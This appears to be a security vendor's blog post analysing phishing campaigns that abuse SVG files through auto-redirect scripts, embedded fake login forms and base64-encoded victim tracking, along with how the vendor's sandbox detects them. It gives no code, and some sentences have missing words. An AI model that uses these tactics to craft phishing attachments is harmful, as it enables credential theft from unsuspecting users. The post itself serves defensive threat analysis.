Introduction
Scalable Vector Graphics (SVG) files are increasingly being abused as initial phishing vectors. . At VMRay, our continuous threat monitoring has revealed multiple distinct SVG-powered phishing campaigns.
In this blog, we dissect the underlying tactics, payload delivery mechanisms, and detection strategies to strengthen your defenses.
Why SVG? (The Attack Surface)
SVGs are XML-based graphics capable of embedding JavaScript and HTML via `foreignObject`, `<script>` tags, or Base64-encoded payloads making them executable content, not just images.
Because many security systems treat SVGs as images, they can slip past MIME-type and common signature filters which would mean they will bypass these checks to allow malicious files to be delivered.
SVGs also open in browsers by default—which is often disregarded by security systems—offering direct command execution in unsuspecting user environments.
Campaign Variants: SVGs as Attack Vectors
Redirector SVGs
Tactic:
These SVGs embed obfuscated JavaScript that triggers an automatic redirect when the file is opened. The destination is often a credential-harvesting site or a malware payload.
Example Use Case:
An SVG titled Action_Required__INVERCENTERUSA_2025_Compliance_Reminder.svg is sent as an attachment. When opened in a browser, it silently redirects the user to a spoofed login page.
Targeting & Tracking:
Victim identifiers, such as email addresses, are often base64-encoded within the SVG and appended to the redirect URL. This enables pre-filled phishing forms and tracks individual interactions.
Self-Contained Phishing in SVG
Tactic:
The entire phishing experience—HTML, CSS, and JavaScript—is embedded within the SVG file, sometimes Base64-encoded. It renders locally without needing external resources.
Example Use Case:
An SVG posing as a secure document opens to display a cloned login form rendered within the SVG itself. When users enter credentials, the data is sent directly to the attacker’s server.
Targeting & Tracking:
No external requests are made until form submission, but the victim identifiers also exist in the SVG.
Detection Strategies (How we handle SVGs)
At VMRay, our latest VTI (VMRay Threat Identifier) rules specifically support detecting powered phishing via multiple techniques. O here is that VMRay‘s sandbox environment simulates real-world browser rendering, enables automatic detection of phishing behavior triggered after SVG interaction—an approach that static filters often miss.
An SVG file that contains only JavaScript to redirect to another website:
The phishing attack here consists of two redirections steps. The SVG file immediately executes embedded JavaScript once rendered in a Browser followed by an automated redirect to a fake DocuSign page, then the landing page seamlessly forwards the victim to a credential-harvesting logon .
Figure 1: SVG containing only redirection JavaScript
As seen here, static analysis for just the file wouldn’t show anything because just a redirection.
our dynamic web analysis follows redirections, it was able to reveal and analyze the final phishing landing page:
Figure 2: Second stage of phishing
Figure 3: Final stage of phishing (fake logon form)
As benign SVG files usually contain more than just JavaScript and won’t act as a simple redirector we trigger a VTI rule based on these indicators.
Figure 4: SVG Smuggling VTI triggered
Figure 5: SVG containing the logon form
Figure 6: SVG file rendering a Microsoft Excel phishing page
Figure 7: SVG Smuggling VTI triggered
Figure 9: Automated human-like browser interaction reveals next stage
Figure 10: SVG Smuggling and Phishing VTIs triggered
SVG-based phishing represents a sophisticated evolution in attacker tradecraft—. As we’ve demonstrated, malicious actors are increasingly leveraging SVG files to embed phishing pages, execute redirections and harvest credentials—all while evading traditional .
VMRay‘s behavioral sandboxing and VTI-based detection strategies are uniquely positioned to uncover the dynamic nature of these threats. By simulating user interactions and parsing embedded behaviors at runtime, we provide defenders with the visibility needed to detect and respond to modern phishing tactics that traditional filters overlook.
this technique continues to gain traction in phishing kits and malware delivery campaigns, defenders must adapt by incorporating behavioral analysis into their workflows, t attachment handling policies, and educating users about the risks posed by seemingly harmless file .
